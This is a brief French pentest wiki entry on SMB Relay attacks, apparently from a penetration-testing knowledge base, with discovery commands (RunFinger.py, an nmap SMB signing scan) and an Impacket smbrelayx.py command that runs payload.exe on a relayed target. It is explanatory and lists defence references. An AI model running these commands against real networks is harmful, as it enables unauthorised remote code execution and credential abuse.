SMB Relay

SMB Relay est une méthode d’attaque permettant de relayer une authentification NTLM pour s’authentifier auprès d’un service SMB.

Méthodologie

Pour pouvoir faire un SMB relay il faut avoir une requête à relayer. De nombreuses méthodes sont décrites sur Places of Interest in Stealing NetNTLM Hashes. La méthode la plus classique reste Responder.

Outils

Découverte

Il est possible d’identifier les serveurs vulnérables avec un des scripts suivants:

/usr/share/responder/tools/RunFinger.py -i $target
nmap --script smb-security-mode.nse -Pn -p445 X.X.X.X/24 -oA nmap_smb_security_mode_full

Exploitation

Impacket propose un outil smbrelayx.py:

Une utilisation simple est la suivante:

smbrelayx.py -e payload.exe -h 10.33.1.1

Ceci executera le fichier payload.exe sur le serveur 10.33.1.1 si l’utilisateur qu’on relaie a les droits nécessaires.

Responder contient également différents outils.

Références

Liens externes

• SMBRelay avec python sur SANS
• SMB Relay sur carnal0wnage
• Méthodes de défense sur skullsecurity
• MS08_068 + MS10_046 = FUN UNTIL 2018
• Places of Interest in Stealing NetNTLM Hashes